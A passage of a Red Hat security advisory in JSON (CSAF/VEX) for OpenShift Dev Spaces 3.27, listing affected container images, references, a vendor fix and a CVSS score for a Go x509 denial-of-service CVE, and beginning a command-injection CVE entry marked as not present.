"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-64756",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2025-11-17T18:01:28.077927+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
